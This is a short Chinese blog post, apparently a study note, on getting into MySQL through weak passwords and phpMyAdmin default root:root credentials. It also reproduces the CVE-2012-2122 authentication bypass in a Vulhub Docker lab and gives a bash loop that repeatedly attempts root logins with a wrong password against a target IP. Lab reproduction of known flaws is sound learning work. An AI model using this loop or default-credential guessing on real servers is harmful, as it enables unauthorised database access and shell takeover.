意识薄弱-弱口令爆破
安全机制-特定安全漏洞
0x00MySQL默认配置root用户禁止外连
就算爆破出正确用户名密码也无法登录,如果爆破出非root用户账号密码,价值也不大
所以如果目标网站部署了phpMyAdmin,找到phpMyAdmin目录(如果使用phpStudy,phpMyAdmin默认在WWW文件夹下)
然后可以猜解phpMyAdmin(默认账号密码为root:root)来实现外部连接MySQL root用户。
接下来的拿shell *** 作推荐看这篇文章:
phpMyAdmin拿shell的两种方法 - -冰封 - 博客园 (cnblogs.com)
个人建议能用文中上述两种方法解决就不要用慢查询日志写入shell,本来phpMyAdmin响应就比较慢,还要sleep延时这谁顶得住啊
0x01CVE-2012-2122 Mysql 身份认证绕过漏洞
参考网址:Vulhub - Docker-Compose file for vulnerability environment
在Ubuntu中搭建docker虚拟靶场后运行第一行代码启动环境
接着在另一台虚拟机上运行第二行代码利用for in循环对靶机实施漏洞复现(将target_ip改为虚拟机IP)
docker-compose up -d
for i in `seq 1 1000`; do mysql -uroot -pwrong -h target_ip -P3306; done
如何查看靶机IP:
输入ifconfig后取ens33(后面的数字不同机器可能会有出入)中的IP地址
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)